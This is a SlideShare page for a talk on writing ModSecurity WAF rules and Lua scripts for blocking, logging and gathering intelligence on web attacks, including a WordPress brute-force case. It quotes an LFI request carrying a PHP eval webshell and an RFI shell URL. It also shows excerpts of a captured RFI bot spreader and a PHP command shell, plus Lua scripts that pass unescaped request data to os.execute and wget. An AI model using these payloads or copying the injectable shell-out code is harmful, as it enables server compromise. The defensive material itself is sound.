Robert Rowley, profile picture
Uploaded byRobert Rowley
4,975 views

Teaching Your WAF New Tricks

The document presents an overview of writing rules for web application firewalls (WAFs) using ModSecurity and Lua scripting. It discusses various rule examples, including blocking malicious requests, logging, and intelligence collection techniques, particularly in the context of real-world incidents like a WordPress brute force attack. The presentation emphasizes the importance of understanding WAF scripting capabilities to effectively mitigate security threats.

Embed presentation

© 2012 Presented by: Teaching your WAF new tricks Robert Rowley Security Researcher rrowley@trustwave.com
© 2012 Disclaimer: The scripts contained in these slides are not recommended for you to use in production. If you get fired, it's your own fault. Harass me on twitter: @iamlei
© 2012 Agenda • Preamble – Writing a normal rule – Lua introduction – Scripting with: exec, @inspectFile, SecRuleScript • Counter Intelligence – RFI hunting/gathering – Malicious request intelligence collection – That WordPress Incident
© 2012 Why me?
© 2012 Mod sec intro  Write a rule  Block, Log, Repeat  Apache  IIS, Nginx (Beta)
© 2012 mod_sec variables REQUEST_BODY REQUEST_COOKIES REQUEST_FILENAME REQUEST_HEADERS REQUEST_LINE REQUEST_METHOD REQUEST_URI RESPONSE_BODY RESPONSE_HEADERS SCRIPT_FILENAME SCRIPT_USERNAME TIME ARGS ARGS_NAMES AUTH_TYPE ENV FILES FILES_NAMES FILES_SIZES QUERY_STRING REMOTE_ADDR REMOTE_HOST REMOTE_PORT REMOTE_USER ...AND BEYOND!
© 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ...
© 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ... SecRule &ARGS “@gt 100” deny
© 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ... SecRule &ARGS “@gt 1000” deny
© 2012© 2012 Adding Scripts!
© 2012 Which one is not like the others? 192.168.69.101 "GET /index.php?include=pages” HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...” 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00” HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>” 192.168.69.101 "GET /” HTTP/1.1" 200 “Mozilla/5.0 (compatible; Baiduspider/2.0; ...”
© 2012 Which one is not like the others? 192.168.69.101 "GET /index.php?include=pages” HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...” 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00” HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>” 192.168.69.101 "GET /” HTTP/1.1" 200 “Mozilla/5.0 (compatible; Baiduspider/2.0; ...”
© 2012 Another Normal Rule Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny Blocks: 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00 HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>”
© 2012 Another Normal Rule Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny
© 2012 Not So Normal Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny,exec:dirty_firewaller.lua
© 2012 A little lua intro  Object oriented (Everything is a table)  Light and easy  Available in other tools – Nmap – Wireshark – WoW
© 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
© 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
© 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
© 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:htaccess_firewaller.lua --- htaccess_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) local fh = io.open(“/path/to/.htaccess”, a+) fh:write(“deny from “..bad_ip) fh:close() end
© 2012 Using @inspectFile SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny
© 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
© 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
© 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
© 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
© 2012 SpiderLabs making it awesome • Implemented their own AV detection using ClamAV • It’s in the spiderlabs github • https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/ runav.pl
© 2012 Matching With Scripts SecRuleScript “check_blacklist.lua” deny
© 2012 Matching With Scripts SecRuleScript “check_blacklist.lua” deny --- check_blacklist.lua --- function main() local ip = m.getvar('REMOTE_ADDR') for line in io.lines("blacklist.txt") do if string.match(ip, line) then return 1 end end end
© 2012 Matching With Scripts SecRule REQUEST_URI “admin” deny,chain SecRuleScript “check_blacklist.lua” --- check_blacklist.lua --- function main() local ip = m.getvar('REMOTE_ADDR') for line in io.lines("blacklist.txt") do if string.match(ip, line) then return 1 end end end
© 2012 SpiderLabs making it awesome #2 “ipMatchFromFile” implemented in release 2.7 SecRule REQUEST_URI “admin” deny,chain SecRule ‘@ipMatchFromFile blacklist.txt’
© 2012© 2012 Counter Intelligence
© 2012 RFI Hunting 192.168.69.101 - - [08/Oct/2012:11:19:27 -0700] "GET /thumb.php?src=http://site.com/shell.txt HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Trivial to pull from logs
© 2012 RFI Hunting 192.168.69.101 - - [08/Oct/2012:11:12:43 -0700] "POST /thumb.php HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Problem …
© 2012 rfi_logger.lua SecRule ARGS “^http://” allow,exec:rfi_logger.lua function main() local ip = m.getvar("REMOTE_ADDR") local url = m.getvar("REQUEST_URI") local args = m.getvars("ARGS") for j = 1, #args do if(string.match(args[j].value, 'http')) then fh = io.open("/tmp/backdoor", "a") fh:write("---"..ip.." "..url.." "..args[j].name.."="..args[j].value.."---n") fh:close() os.execute("wget –q –x -P /tmp/rfi_files/ '"..args[j].value) end end end
© 2012 <?php ###[ SEMBON CrEw SPREAD for RFIBot (2.3) ]### error_reporting(0); ##### CONFIG ##### $mode = $_GET["mode"]; $url = 'http://www.web-faq.jp/click_counter/data/.data/'; //URL path $src = $url.'cmd'; //Source Shell $shell = '404.php'; //Backdoor PHPShell name $bot = $url.'bot'; //Source PHPBot ##### SPREAD ##### ... die(base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Failed!'); //encode biar lebih optimal! } ... It works
© 2012 <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C> <H1>Changing this CMD will result in corrupt scanning !</H1> </html></head></body> <?php ... function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } ... It works
© 2012 Better than a blacklist 1) Capture Request 2) Log IP Malicious Request WAF script
© 2012 Better than a blacklist Request WAF script Unobstructed Response 1) Capture Request 2) Log All Data Malicious Host Unknown Host
© 2012 Put it together SecRule REQUEST_HEADERS:User-Agent “<? php” deny,status:200,exec:blacklist_ip.lua SecRule ‘@ipMatchFromFile blacklist.txt’ deny,status:200,exec:uber_logger.lua
© 2012 Put it together SecRule REQUEST_HEADERS:User-Agent “<? php” deny,status:200,exec:blacklist_ip.lua --- blacklist_ip.lua --- function main() local ip = m.getvar("REMOTE_ADDR") fh = io.open("blacklist.txt", "a") fh:write(ip.."n") fh:close() end
© 2012 Put it together SecRule ‘@ipMatchFromFile blacklist.txt’ deny,status:200,exec:uber_logger.lua --- uber_logger.lua --- function main() local ip = m.getvar("REMOTE_ADDR") local url = m.getvar("REQUEST_URI") local args = m.getvars("ARGS") local headers = m.getvars("REQUEST_HEADERS") local logstring = " " for j = 1, #headers do logstring = logstring.." "..headers[j].name.."="..headers[j].value end for j = 1, #args do logstring = logstring.." "..args[j].name.."="..args[j].value end fh = io.open("/tmp/uberlog", "a+") fh:write(ip.." "..url.." "..logstring.."n") fh:close() end
© 2012 Put it together Uberlog data 69.110.217.76 /index.php?arg=<script>alert(1);</script> REQUEST_HEADERS:User-Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:arg=<script>alert(1);</script> 69.110.217.76 /index.php?-s REQUEST_HEADERS:User- Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:-s=
© 2012 Data Mining Capture only on malicious requests Log far more data – REQUEST_HEADERS – POST variables – COOKIE data – FILES uploaded in the request – GeoIP information – Live data on the attack – Make pretty* graphs * OK they are not that pretty
© 2012 Graphs!
© 2012 Graphs!
© 2012 Graphs!
© 2012 The WordPress Incident (Monitoring Brute Force Attacks) “Massive” WordPress attack in early April 2013. Reported by several Hosting providers as reason for outages. A Mr. Brian K. blogged that it was a botnet recruiting run. Coincidentally: I had been monitoring wp-login.php requests with full data for months.
© 2012 The WordPress Incident (Why was I logging?) Someone* complained on twitter** Their logs looked like this: POST wp-login.php POST wp-login.php POST wp-login.php POST wp-login.php POST wp-login.php They wanted to know more. * it was @Viss ** First time ever that complaining on twitter was beneficial, but not to the complainer.
© 2012 The WordPress Incident (Script I re-used) I decided to put the “ueberlogger.lua” script to work. SecRule REQUEST_URI wp-login.php allow,exec:uberlogger.lua
© 2012 The WordPress Incident (Script I re-used) I decided to put the “ueberlogger.lua” script to work. SecRule REQUEST_URI wp-login.php allow,exec:uberlogger.lua x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=1admin x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=admins x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=webmaster x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=password x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=111111 x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=naruto
© 2012 The WordPress Incident (Data I got) Password list of the brute force Frequency of attacks against sites I controlled Passwords naruto pokemon 123456 admin Sitename123 etc... Correlated with the data from other researchers
© 2012 The WordPress Incident (My Perspective) ● It was a brute force, but a lame one. ● It got press because hosts were going down. ● Evidence that WP auth mechanisms can cause DoS. ● WordPress is a buzzword for security press ● Read my article all about WP auth on the blog.spiderlabs.com :).
© 2012 The WordPress Incident (My Perspective) ● It was a brute force, but a lame one. ● It got press because hosts were going down. ● Evidence that WP auth mechanisms can cause DoS. ● WordPress is a buzzword for security press ● Read my article all about WP auth on the blog.spiderlabs.com :).
© 2012 Bibliography/Questions?  http://www.modsecurity.org  http://www.lua.org  http://blog.spiderlabs.com SpiderLabs github  https://github.com/SpiderLabs You seriously want my code?  https://github.com/rawrly/ModSecScripts Take your pitchfork to me on twitter: @iamlei

More Related Content

PPTX
Physical web
byJeff Prestes
 
PDF
Mobile Device APIs
byJames Pearce
 
PDF
#SPUG - Legacy applications
byPiotr Pasich
 
PDF
Legacy applications - 4Developes konferencja, Piotr Pasich
byPiotr Pasich
 
PDF
Php web backdoor obfuscation
bySandro Zaccarini
 
PDF
Attacking Oracle with the Metasploit Framework
byChris Gates
 
PDF
Api Design
bysumithra jonnalagadda
 
PDF
PHP Backdoor: The rise of the vuln
bySandro Zaccarini
 
Physical web
byJeff Prestes
 
Mobile Device APIs
byJames Pearce
 
#SPUG - Legacy applications
byPiotr Pasich
 
Legacy applications - 4Developes konferencja, Piotr Pasich
byPiotr Pasich
 
Php web backdoor obfuscation
bySandro Zaccarini
 
Attacking Oracle with the Metasploit Framework
byChris Gates
 
Api Design
bysumithra jonnalagadda
 
PHP Backdoor: The rise of the vuln
bySandro Zaccarini
 

What's hot

PDF
ApacheConNA 2015: What's new in Apache httpd 2.4
byJim Jagielski
 
PDF
Stop Worrying & Love the SQL - A Case Study
byAll Things Open
 
PPTX
How to make your Money Machine with Internet of Things
byJeff Prestes
 
PDF
BP-6 Repository Customization Best Practices
byAlfresco Software
 
PDF
Invoke-DOSfuscation
byDaniel Bohannon
 
PDF
The symfony platform: Create your very own framework (PHP Quebec 2008)
byFabien Potencier
 
KEY
Socket applications
byJoão Moura
 
PPT
Symfony2 and AngularJS
byAntonio Peric-Mazar
 
PPT
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
byDavid Stockton
 
PPTX
Fun with exploits old and new
byLarry Cashdollar
 
PPTX
What mom never told you about bundle configurations - Symfony Live Paris 2012
byD
 
PPTX
How to discover 1352 Wordpress plugin 0days in one hour (not really)
byLarry Cashdollar
 
PDF
Vincent Ruijter - ~Securing~ Attacking Kubernetes
byhacktivity
 
PDF
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
byDaniel Bohannon
 
PDF
soft-shake.ch - Hands on Node.js
bysoft-shake.ch
 
PDF
2021laravelconftwslides11
byLiviaLiaoFontech
 
PDF
2020-02-20 - HashiCorpUserGroup Madring - Integrating HashiCorp Vault and Kub...
byAndrey Devyatkin
 
PDF
Big Data Web applications for Interactive Hadoop by ENRICO BERTI at Big Data...
byBig Data Spain
 
PDF
Codetainer: a Docker-based browser code 'sandbox'
byJen Andre
 
KEY
PyCon US 2012 - State of WSGI 2
byGraham Dumpleton
 
ApacheConNA 2015: What's new in Apache httpd 2.4
byJim Jagielski
 
Stop Worrying & Love the SQL - A Case Study
byAll Things Open
 
How to make your Money Machine with Internet of Things
byJeff Prestes
 
BP-6 Repository Customization Best Practices
byAlfresco Software
 
Invoke-DOSfuscation
byDaniel Bohannon
 
The symfony platform: Create your very own framework (PHP Quebec 2008)
byFabien Potencier
 
Socket applications
byJoão Moura
 
Symfony2 and AngularJS
byAntonio Peric-Mazar
 
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
byDavid Stockton
 
Fun with exploits old and new
byLarry Cashdollar
 
What mom never told you about bundle configurations - Symfony Live Paris 2012
byD
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
byLarry Cashdollar
 
Vincent Ruijter - ~Securing~ Attacking Kubernetes
byhacktivity
 
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
byDaniel Bohannon
 
soft-shake.ch - Hands on Node.js
bysoft-shake.ch
 
2021laravelconftwslides11
byLiviaLiaoFontech
 
2020-02-20 - HashiCorpUserGroup Madring - Integrating HashiCorp Vault and Kub...
byAndrey Devyatkin
 
Big Data Web applications for Interactive Hadoop by ENRICO BERTI at Big Data...
byBig Data Spain
 
Codetainer: a Docker-based browser code 'sandbox'
byJen Andre
 
PyCon US 2012 - State of WSGI 2
byGraham Dumpleton
 

Viewers also liked

PDF
FIRST CONNECTIONS
byAshok Mishra
 
DOCX
Sebastian
bysebastian davila velez
 
PPTX
Chapter 17
byMorgan Bertrand
 
PPTX
Tablettes
byThu Tran Htn
 
PDF
Orientação Sexual
byAndreiDiogo
 
PDF
Edifice Profile
byEdifice Tech Solutions
 
DOCX
Comunicado alumnos liceo 2
byMaría Noel Herrera
 
PDF
111027 Diario La Nación
byMintrabajo
 
PPTX
The Word
byhardnett
 
PPTX
Nimbus Ninjas Market Map
bynitnag
 
DOCX
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...
byJuan Cruz Vega
 
PDF
Constante dieléctrica
byJuand Martinez Rodriguez
 
DOC
SMejiaResume (1)
bySarah Mejia
 
PPTX
Rahul Prasad Art-4
byRahul Prasad
 
PDF
CV S Sirkar 2016.docx
byShahir Sirkar
 
FIRST CONNECTIONS
byAshok Mishra
 
Sebastian
bysebastian davila velez
 
Chapter 17
byMorgan Bertrand
 
Tablettes
byThu Tran Htn
 
Orientação Sexual
byAndreiDiogo
 
Edifice Profile
byEdifice Tech Solutions
 
Comunicado alumnos liceo 2
byMaría Noel Herrera
 
111027 Diario La Nación
byMintrabajo
 
The Word
byhardnett
 
Nimbus Ninjas Market Map
bynitnag
 
Coloquio nuevas perpectivas para el estudio de los movimientos sociales en am...
byJuan Cruz Vega
 
Constante dieléctrica
byJuand Martinez Rodriguez
 
SMejiaResume (1)
bySarah Mejia
 
Rahul Prasad Art-4
byRahul Prasad
 
CV S Sirkar 2016.docx
byShahir Sirkar
 

Similar to Teaching Your WAF New Tricks

DOCX
Web-servers & Application Hacking
byRaghav Bisht
 
PPTX
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
byEC-Council
 
PDF
LFI to RCE Exploit with Perl Script
byPrathan Phongthiproek
 
PDF
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
byIsmail Tasdelen
 
PDF
LFI
byМихаил Фирстов
 
PDF
Rooted 2010 ppp
bynoc_313
 
PDF
LFI to RCE
byn|u - The Open Security Community
 
PPTX
Prevent hacking
byViswanath Polaki
 
PDF
PowerPoint Presentation
bywebhostingguy
 
PDF
Art of Web Backdoor - Pichaya Morimoto
byPichaya Morimoto
 
PDF
Php vulnerability presentation
bySqa Enthusiast
 
KEY
DVWA BruCON Workshop
bytestuser1223
 
PDF
Introduction to Snort Rule Writing
byCisco DevNet
 
KEY
Apache Wizardry - Ohio Linux 2011
byRich Bowen
 
PPTX
Perl basics for pentesters part 2
byn|u - The Open Security Community
 
PDF
Python for Penetration testers
byChristian Martorella
 
PDF
Website Hacking Oldie
byAung Khant
 
PDF
CNIT 129S: 10: Attacking Back-End Components
bySam Bowne
 
PDF
Python cgi programming
bySmt. Indira Gandhi College of Engineering, Navi Mumbai, Mumbai
 
PDF
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
byCode Engn
 
Web-servers & Application Hacking
byRaghav Bisht
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
byEC-Council
 
LFI to RCE Exploit with Perl Script
byPrathan Phongthiproek
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
byIsmail Tasdelen
 
LFI
byМихаил Фирстов
 
Rooted 2010 ppp
bynoc_313
 
LFI to RCE
byn|u - The Open Security Community
 
Prevent hacking
byViswanath Polaki
 
PowerPoint Presentation
bywebhostingguy
 
Art of Web Backdoor - Pichaya Morimoto
byPichaya Morimoto
 
Php vulnerability presentation
bySqa Enthusiast
 
DVWA BruCON Workshop
bytestuser1223
 
Introduction to Snort Rule Writing
byCisco DevNet
 
Apache Wizardry - Ohio Linux 2011
byRich Bowen
 
Perl basics for pentesters part 2
byn|u - The Open Security Community
 
Python for Penetration testers
byChristian Martorella
 
Website Hacking Oldie
byAung Khant
 
CNIT 129S: 10: Attacking Back-End Components
bySam Bowne
 
Python cgi programming
bySmt. Indira Gandhi College of Engineering, Navi Mumbai, Mumbai
 
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
byCode Engn
 

More from Robert Rowley

PDF
WordPress Security (know your enemy WordCamp Kyoto)
byRobert Rowley
 
ODP
Detecting and Defending Your Privacy Against State-Actor Surveillance
byRobert Rowley
 
ODP
Privacy; Past, Present and Future
byRobert Rowley
 
ODP
Wordpress Security 101
byRobert Rowley
 
ODP
State of Web App Security 2012
byRobert Rowley
 
ODP
Juice Jacking 101
byRobert Rowley
 
ODP
Nmap Scripting Engine and http-enumeration
byRobert Rowley
 
WordPress Security (know your enemy WordCamp Kyoto)
byRobert Rowley
 
Detecting and Defending Your Privacy Against State-Actor Surveillance
byRobert Rowley
 
Privacy; Past, Present and Future
byRobert Rowley
 
Wordpress Security 101
byRobert Rowley
 
State of Web App Security 2012
byRobert Rowley
 
Juice Jacking 101
byRobert Rowley
 
Nmap Scripting Engine and http-enumeration
byRobert Rowley
 

Recently uploaded

PDF
UiPath Automation Developer Associate Training Series 2026 - Session 1
byDianaGray10
 
PDF
AI and Zero Trust: What it takes to do it right
byMark Simos
 
PDF
TrustArc Webinar - From Zero to Privacy Hero: Launching Your Program Right an...
byTrustArc
 
PPTX
Cyber security chapter 1 for learning and educating to the students who want ...
byGulMohammadi
 
PDF
Taxonomy Alignment for SDG Tagging - ASHA Case Study
byEnterprise Knowledge
 
PDF
React Mastery: Visual Mental Models to Understand React Deeply
byThomas Gaye
 
PDF
Computer-Based Training (CBT) The Backbone of Modern Technical & Defence Trai...
bycomputerbasedtrainin1
 
PDF
Chapter 4 Network Security in computer security
byGetnet Tigabie Askale -(GM)
 
PDF
"Painless Major Upgrade: A Strategy for Updating Large Codebases", Andrii Yat...
byFwdays
 
PPTX
Software Engineering in the Age of AI Agents
byHusseinMalikMammadli
 
PDF
What Thema can do: Leveraging metadata to support the discoverability of Firs...
byBookNet Canada
 
PDF
Post-Hackathon-Learnings-Maximizing-Impact-Beyond-the-Event.pdf
byishantyadav1111
 
PDF
Title Installing Windows, Linux, MacOS.pdf
byGeraldAbadajos
 
PPTX
TechSprint Inauguration at SJB Institute of Technology held on 18 December 2025
bysuhasspgdg
 
PDF
How to build hackthon projects from ZERO!
byishantyadav1111
 
PPTX
Introduction to Artificial Intelligence (AI).pptx
byammar414783
 
PDF
7 Essential Types of Penetration Testing Services Every Business Should Under...
bypandeydevika621
 
PDF
Pneumatic Pressure Pump PPP01 for Calibration & Testing
bySERRAX TECHNOLOGIES LLP
 
PDF
2026_01_28 - OpenMetadata Community Meeting.pdf
byOpenMetadata
 
PPTX
2026 SCORM Troubleshooting Rustici + dominKnow.pptx
byRustici Software
 
UiPath Automation Developer Associate Training Series 2026 - Session 1
byDianaGray10
 
AI and Zero Trust: What it takes to do it right
byMark Simos
 
TrustArc Webinar - From Zero to Privacy Hero: Launching Your Program Right an...
byTrustArc
 
Cyber security chapter 1 for learning and educating to the students who want ...
byGulMohammadi
 
Taxonomy Alignment for SDG Tagging - ASHA Case Study
byEnterprise Knowledge
 
React Mastery: Visual Mental Models to Understand React Deeply
byThomas Gaye
 
Computer-Based Training (CBT) The Backbone of Modern Technical & Defence Trai...
bycomputerbasedtrainin1
 
Chapter 4 Network Security in computer security
byGetnet Tigabie Askale -(GM)
 
"Painless Major Upgrade: A Strategy for Updating Large Codebases", Andrii Yat...
byFwdays
 
Software Engineering in the Age of AI Agents
byHusseinMalikMammadli
 
What Thema can do: Leveraging metadata to support the discoverability of Firs...
byBookNet Canada
 
Post-Hackathon-Learnings-Maximizing-Impact-Beyond-the-Event.pdf
byishantyadav1111
 
Title Installing Windows, Linux, MacOS.pdf
byGeraldAbadajos
 
TechSprint Inauguration at SJB Institute of Technology held on 18 December 2025
bysuhasspgdg
 
How to build hackthon projects from ZERO!
byishantyadav1111
 
Introduction to Artificial Intelligence (AI).pptx
byammar414783
 
7 Essential Types of Penetration Testing Services Every Business Should Under...
bypandeydevika621
 
Pneumatic Pressure Pump PPP01 for Calibration & Testing
bySERRAX TECHNOLOGIES LLP
 
2026_01_28 - OpenMetadata Community Meeting.pdf
byOpenMetadata
 
2026 SCORM Troubleshooting Rustici + dominKnow.pptx
byRustici Software
 

Teaching Your WAF New Tricks

  • 1.
    © 2012 Presented by: Teachingyour WAF new tricks Robert Rowley Security Researcher rrowley@trustwave.com
  • 2.
    © 2012 Disclaimer: Thescripts contained in these slides are not recommended for you to use in production. If you get fired, it's your own fault. Harass me on twitter: @iamlei
  • 3.
    © 2012 Agenda • Preamble –Writing a normal rule – Lua introduction – Scripting with: exec, @inspectFile, SecRuleScript • Counter Intelligence – RFI hunting/gathering – Malicious request intelligence collection – That WordPress Incident
  • 4.
  • 5.
    © 2012 Mod secintro  Write a rule  Block, Log, Repeat  Apache  IIS, Nginx (Beta)
  • 6.
  • 7.
    © 2012 Normal WAFrule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ...
  • 8.
    © 2012 Normal WAFrule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ... SecRule &ARGS “@gt 100” deny
  • 9.
    © 2012 Normal WAFrule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ... SecRule &ARGS “@gt 1000” deny
  • 10.
  • 11.
    © 2012 Which oneis not like the others? 192.168.69.101 "GET /index.php?include=pages” HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...” 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00” HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>” 192.168.69.101 "GET /” HTTP/1.1" 200 “Mozilla/5.0 (compatible; Baiduspider/2.0; ...”
  • 12.
    © 2012 Which oneis not like the others? 192.168.69.101 "GET /index.php?include=pages” HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...” 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00” HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>” 192.168.69.101 "GET /” HTTP/1.1" 200 “Mozilla/5.0 (compatible; Baiduspider/2.0; ...”
  • 13.
    © 2012 Another NormalRule Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny Blocks: 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00 HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>”
  • 14.
    © 2012 Another NormalRule Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny
  • 15.
    © 2012 Not SoNormal Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny,exec:dirty_firewaller.lua
  • 16.
    © 2012 A littlelua intro  Object oriented (Everything is a table)  Light and easy  Available in other tools – Nmap – Wireshark – WoW
  • 17.
    © 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent“<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
  • 18.
    © 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent“<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
  • 19.
    © 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent“<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
  • 20.
    © 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent“<?php” deny,exec:htaccess_firewaller.lua --- htaccess_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) local fh = io.open(“/path/to/.htaccess”, a+) fh:write(“deny from “..bad_ip) fh:close() end
  • 21.
